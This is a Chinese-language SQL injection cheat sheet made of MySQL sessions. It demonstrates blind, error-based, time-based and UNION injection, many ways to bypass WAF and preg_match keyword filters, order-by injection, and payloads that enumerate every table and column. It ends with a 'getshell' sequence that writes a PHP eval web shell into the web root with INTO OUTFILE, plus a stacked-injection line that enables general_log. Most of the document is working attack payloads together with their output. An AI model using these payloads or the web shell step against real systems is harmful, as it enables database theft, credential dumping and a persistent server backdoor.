常见注入方式
1.Boolean-based blind
mysql> select*from`test`where`id`=1 and left(version(),1)=8;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
mysql> select*from`test`where`id`=1 and ascii(substr((select table_name from information_schema.tables where table_schema=data base() limit 0,1),2,1))=101;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
2.Error-based
mysql> select * from test where id=1 union select version(),@@version_compile_os,floor(rand(0)*2)x from information_schema.character_sets group by x;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 8.0.12 | osx10.13 | 0 |
| 8.0.12 | osx10.13 | 1 |
+--------+----------+----------------------------------+
3.AND/OR time-based blind
mysql> select * from test where id=1 and sleep(2);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
Time: 2.053s
mysql> select * from test where id=1 or sleep(2);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
Time: 6.226s
4.UNION query
mysql> select * from test where id=1 union select * from test;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
常用函数
concat:将多个字符串连接成一个字符串
group_concat:返回一个字符串结果,该结果由分组中的值连接组合而成
concat_ws: concat with separator 指定参数之间的分隔符
system_user():系统用户名
user():用户名
current_user:当前用户名
session_user():连接数据库的用户名
database():数据库名
version():数据库版本
load_file():读取本地文件的函数
@@datadir:读取数据库路径(5.0 以上版本)
@@basedir:安装路径
@@version_compile_os:操作系统
@@HOSTNAME:主机名
判断是否具有读写权限
读取
mysql> select*from`test`where`id`=1 and (select count(*) from mysql.user)>0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
写入
mysql> select*from`test`where`id`=1 and (select count(file_priv) from mysql.user)>0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=1 and (select count(file_priv) from mysql.user)<0
+----+----------+----------+
| id | username | password |
+----+----------+----------+
注入绕过
1.字段列数不够
mysql> select * from test where id=1 union select null,floor(rand(0)*2)x from information_schema.tables group by x;
(1222, u'The used SELECT statements have a different number of columns'')
mysql> select * from test where id=1 union select null,null,floor(rand(0)*2)x from information_schema.tables group by x; -- 用null或者其他字符填充
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | <null> | 0 |
| <null> | <null> | 1 |
+--------+----------+----------------------------------+
2.过滤空格
mysql> select(username)from(test)where(id)=1;
+----------+
| username |
+----------+
| admin |
+----------+
mysql> select * from test where id=1E0union select 1,2,3 --浮点数 1.0
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 1 | 2 | 3 |
+----+----------+----------------------------------+
mysql> select*from/**/test/**/where/**/id=1;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=2;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=1 union select@1=@1,2,3;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | 2 | 3 |
+--------+----------+----------------------------------+
mysql> select*from`test`where`id`=1 union select@1,2,3;
+--------+----------+----------------------------------+
| id | username | password |
+--------+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| <null> | 2 | 3 |
+--------+----------+----------------------------------+
备注: 一个 @ 表示用户定义,@@ 表示系统变量
在php中 \s 会匹配0x09,0x0a,0x0b,0x0c,0x0d,0x20
09:Horizontal Tab
0A:New Line
0B:Vertical Tab
0C:New Page
0D:Carriage Return
A0:MySQL 中 %a0 代表空白符,可以代替空格
20:Space
a0:空格
2B:+
2D:-
7E:~
21:!
40:@
SQLite3:0A 0D 0C 09 20
MySQL5:09 0A 0B 0C 0D A0 20
PostgreSQL:0A 0D 0C 09 20
Oracle 11g:00 0A 0D 0C 09 20
MSSQL:01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20
3.过滤from x
mysql> select * from. test;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
4.过滤逗号
使用 mid(user() from 1 for 1) 或 substr(user() from 1 for 1)
mysql> select * from test where id=1 and (select ascii(substr(user() from 1 for 1)))=114;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1 and (substr(user() from 1 for 1))='r';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test limit 1 offset 2;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
+----+----------+----------------------------------+
mysql> select * from ((select 1)A join (select 2)B join ((select username from test where id=2))D); -- 相当于:UNION SELECT 1,2,3;
+---+---+----------+
| 1 | 2 | username |
+---+---+----------+
| 1 | 2 | root |
+---+---+----------+
5.过滤大于小于
greatest(x,y),返回x和y中较大的那个数 当然可以用非等于 !=
mysql> select greatest(ascii(mid(user(),1,1)),120)=120;
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),120)=120 |
+------------------------------------------+
| 1 |
+------------------------------------------+
以上是判断user()第一个字符的ascii码是否等于120. 若最终结果为120,返回true(1),否则返回false(0),可编写脚本枚举
6.运算比较之空格过滤
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=110);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1-(ascii(mid((select(user()))from(1)for(1)))=114);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=114);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1/(ascii(mid((select(user()))from(1)for(1)))=115);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
乘法和除法当然也可以
7.过滤and or xor not
and=&& or=|| xor=| not=! 注意在浏览器中输入部分字符需要url编码,例如&&为%26%26
mysql> select * from test where id=1 || (ascii(substr(database(),1,1))=116);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=116);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where id=1 && (ascii(substr(database(),1,1))=115);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
绕过:^, =, !=, %, /, *, &, &&, |, ||, <, >, >>, <<, >=, <=, <>, <=>, XOR, DIV, SOUNDS LIKE, RLIKE, REGEXP, IS, NOT, BETWEEN, ...
8.万能密码之or and优先级
mysql> select * from test where username='nouser' or '1'='1' or '1'='1' -- - and password='123';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
mysql> select * from test where username='nouser' and password='123' or '1'='1';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
9.过滤引号
mysql> select * from test where username=0x61646d696e;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select * from test where username=CHAR(97, 100, 109, 105, 110);
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
10.过滤tables
mysql> select table_name from information_schema.partitions where table_schema=database();
+------------+
| TABLE_NAME |
+------------+
| test |
+------------+
mysql> select table_name from information_schema.statistics where table_schema=database();
+------------+
| TABLE_NAME |
+------------+
| test |
+------------+
mysql> select table_name from information_schema.table_constraints where table_schema=database();
+------------+
| table_name |
+------------+
| test |
+------------+
mysql> select table_name from information_schema.KEY_COLUMN_USAGE where table_schema=database();
+------------+
| table_name |
+------------+
| test |
+------------+
11.过滤select
(布尔|延时)盲注即可,也可以参考第6条
mysql> select*from`test`where`id`=1 and ascii(substr(database(),1,1))=116;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select*from`test`where`id`=1 and if(ascii(substr(database(),1,1))=116,sleep(5),1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
Time: 5.081s
12.过滤union
盲注或者子查询猜解.最好还是编写脚本
mysql> select*from`test`where`id`=2 and (select username from test where id=1)='admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
+----+----------+----------------------------------+
13. 过滤=
使用like 、rlike 、regexp 或者 使用< 或者 >
mysql> select * from test where id=1 union select 1,2,table_name from information_schema.tables where table_name between 0x61 and 0x7a;
+----+----------+------------------------------------------------------+
| id | username | password |
+----+----------+------------------------------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 1 | 2 | CHARACTER_SETS |
| 1 | 2 | COLLATION_CHARACTER_SET_APPLICABILITY |
| 1 | 2 | COLLATIONS |
| 1 | 2 | COLUMN_PRIVILEGES |
...................between char(97) and char(122).......................
+----+----------+------------------------------------------------------+
mysql> select*from`test`where`id`=1 and 1 like 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
mysql> select*from`test`where`id`=1 and 1 like 1;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
mysql> select 1,2,table_name from information_schema.tables where table_name between 'u' and 'v' limit 0,1;
+---+---+-----------------+
| 1 | 2 | TABLE_NAME |
+---+---+-----------------+
| 1 | 2 | USER_PRIVILEGES |
+---+---+-----------------+
mysql> select 1,2,table_name from information_schema.tables where table_name like 'u%' limit 1 offset 1;
+---+---+------------+
| 1 | 2 | TABLE_NAME |
+---+---+------------+
| 1 | 2 | users |
+---+---+------------+
mysql> select 1,2,table_name from information_schema.tables where table_name > 'u' and table_name < 'v' limit 10,1;
+---+---+--------------+
| 1 | 2 | TABLE_NAME |
+---+---+--------------+
| 1 | 2 | user_summary |
+---+---+--------------+
mysql> select*from`users`where`id`=1 AND polygon((select * from(select * from(select user())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b
.user()
from (select ‘root@localhost’ AS user()
from dual) b
)’ value found during parsing
mysql> select*from`users`where`id`=1 AND GeometryCollection((select * from (select * from(select version())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b
.version()
from (select ‘5.5.44-0ubuntu0.14.04.1’ AS version()
from dual) b
)’ value found during parsing
mysql> select*from`users`where`id`=1 AND multipoint((select * from(select * from(select @@basedir)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b
.@@basedir
from (select ‘/usr’ AS @@basedir
from dual) b
)’ value found during parsing
mysql> select*from`users`where`id`=1 AND multilinestring((select * from(select * from(select database())a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b
.database()
from (select ‘test’ AS database()
from dual) b
)’ value found during parsing
mysql> select*from`users`where`id`=1 AND LINESTRING((select * from(select * from(select @@version_compile_os)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b
.@@version_compile_os
from (select ‘debian-linux-gnu’ AS @@version_compile_os
from dual) b
)’ value found during parsing
mysql> select*from`users`where`id`=1 AND multipolygon((select * from(select * from(select @@datadir)a)b));
ERROR 1367 (22007): Illegal non geometric ‘(select b
.@@datadir
from (select ‘/var/lib/mysql/’ AS @@datadir
from dual) b
)’ value found during parsing
mysql> select*from`users`where`id`=1 and exp(~(select * from (select user() ) a) );
ERROR 1690 (22003): DOUBLE value is out of range in ‘exp(~((select ‘root@localhost’ from dual)))’
mysql> select*from`users`where`id`=1 union select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x;
ERROR 1060 (42S21): Duplicate column name ‘5.5.44-0ubuntu0.14.04.1’
mysql> select*from`users`where`id`=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry ‘5.5.44-0ubuntu0.14.04.11’ for key ‘group_key’
15.组合过滤之 preg_match('/(and|or|union|where)/i',$id)
上面基本介绍过了.大家都懂
1 || updatexml(1,concat(0x7e,database(),0x7e),1) -- 超过长度可以配合substr
1 %26%26 extractvalue(1,concat(0x7e,(select database()),0x7e))
1 || (select user from users limit 1) = 'admin'
1 %26%26 if(ascii(substr(database(),1,1))=115,sleep(5),1)
1 || ascii(substr(database(),1,1))=115
16.组合过滤之 preg_match('/(and|or|union|where|limit)/i', $id)
mysql> select*from`test` where id=2 || (select username from test group by id having id = 1) = 'admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
报错注入或者盲注,最主要就是解决limit的问题.用having代替即可
17.组合过滤之 preg_match('/(and|or|union|where|limit|group by)/i', $id)
mysql> select*from`test` where id=2 || (select substr(group_concat(username),1,5) from test) = 'admin';
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb |
+----+----------+----------------------------------+
18.组合过滤之 preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
mysql> select*from`test` where id=-2 || substr(username,1,5) = 0x61646d696e;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
更新分割线
19.过滤 column
知道表名的前提下join报错爆字段
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b) c);
ERROR 1060 (42S21): Duplicate column name ‘id’
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b using(id)) c);
ERROR 1060 (42S21): Duplicate column name ‘username’
mysql> select*from`users`where`id`=1 union select 1,2,(select * from (select * from users a join users b using(id,username)) c);
ERROR 1060 (42S21): Duplicate column name ‘password’
20.order by 注入
基于报错
mysql> select*from`users`order by`id`=rand(updatexml(1,concat(0x7e,database(),0x7e),1));
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’
mysql> select*from`users`order by`id`=1 and updatexml(1,concat(0x7e,database(),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: ‘~test~’
基于返回信息不同
mysql> select*from`users`order by`id`=1 and ascii(substr((select database()),1,1))>1;
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
+----+----------+----------------------------------+-----------+
mysql> select*from`users`order by`id`=1 and ascii(substr((select database()),1,1))<1;
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
+----+----------+----------------------------------+-----------+
基于时间
mysql> select*from`users`order by`id`=1 and if(1=1,sleep(2),1);
+----+----------+----------------------------------+-----------+
| id | username | password | address |
+----+----------+----------------------------------+-----------+
| 1 | admin | 21232f297a57a5a743894a0e4a801fc3 | localhost |
| 2 | root | 63a9f0ea7bb98050796b649e85481845 | baidu.com |
| 3 | test | 098f6bcd4621d373cade4e832627b4f6 | 7xz.cc |
| 4 | testtest | 05a671c66aefea124cc08b76ea6d30bb | 04z.net |
+----+----------+----------------------------------+-----------+
4 rows in set (2.01 sec)
tips
'=' <--> 'like' <--> 'in' --> 'regexp' <--> 'rlike' --> '>' <--> '<'
1.爆所有表列
(SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x) |
2.利用报错发现库表列
mysql> select*from`users`where`username`='admin' and polygon(username);
(1367, u”Illegal non geometric ‘test
.users
.username
’ value found during parsing”)
3.getshell
show variables like '%plugin%';
show variables like "secure_file_priv";
show variables like '%general_log%';
use mysql;
Drop TABLE IF EXISTS shell;
Create TABLE shell (shell text NOT NULL);
Insert INTO shell (shell) VALUES('<?php @eval($_POST[1]);?>');
select shell from shell into outfile '/var/www/html/1.php';
Drop TABLE IF EXISTS shell;
如果存在堆叠注入直接 id=1';set global general_log = on;